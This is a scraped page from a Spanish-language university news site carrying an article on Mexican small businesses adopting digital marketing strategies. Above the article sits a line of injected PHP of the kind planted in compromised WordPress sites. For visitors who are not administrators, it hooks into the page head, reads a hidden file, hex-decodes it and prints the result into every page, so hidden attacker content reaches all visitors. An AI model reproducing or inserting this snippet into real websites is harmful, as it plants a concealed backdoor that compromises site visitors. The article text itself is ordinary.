if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Pymes apuestan por estrategias de Marketing Digital – La Opinión Universitaria La Opinión Universitaria
Menu

Pymes apuestan por estrategias de Marketing Digital

 

Los medios digitales han permitido que las pequeñas y mediana empresas implementen estrategias de marketing que en años anteriores no podían realizar por falta de recursos o conocimiento. Si bien los emprendedores y las Pymes tienen herramientas digitales que permiten crear campañas de marketing para promocionar sus productos o servicios, la realidad es que muchas de estas estrategias son obsoletas, mal implementadas o mal evaluadas.

Estudios realizados a principios de año por la empresa LeadPages señalan que 47 por ciento de los emprendedores y pequeñas empresas gestiona sus estrategias de mercadotecnia de manera autodidacta y personal. Sin embargo, esta situación no siempre rinde los frutos esperados, debido a la falta de conocimientos sobre estrategias complementarias.

Parece que la tendencia comienza a cambiar, al menos en el contexto internacional, esto porque una encuesta realizada recientemente por Thrive Analytics revela que las pymes están ocupando una media de 7.8 canales diferentes -tanto tradicionales como digitales- en sus estrategias de marketing.

Según este estudio, la inversión en marketing aumentará en 42% en 2016, principalmente en mobile y digital como una respuesta a la creciente competencia. Tan sólo en México las pymes conforman el 98 por ciento de la fuerza empresarial, alrededor de 4 millones de 15 mil unidades registradas.

Uno de los principales problemas que enfrentan las pymes es el poco conocimiento de estrategias efectivas de marketing digital.

Se estima que más de 60% de las pymes implementan campañas obsoletas y que su efectividad es nula en el mercado mexicano.

Los cambios en los hábitos de consumo han impactado significativamente en las empresas, hoy se estima que 68 millones de mexicanos se conectan a internet, de ellos 19% buscan información sobre algún producto o servicio y aun más importante 47% ponen atención a la publicidad, pero solo en aquellos sitios o redes sociales que muestran información de su interés.

La tendencia para el resto de este 2016 y el 2017 es la generación de contenido, este esquema se basa en la creación de información que atraiga al segmento de mercado adecuado. La recomendación principal para los emprendedores o Pymes es contratar un proveedor de web hosting para crear un sitio web y asegurarse de que la estructura de su sitio este diseñada para cumplir con los objetivos de la empresa.

No comments

Deja una respuesta

Tweets recientes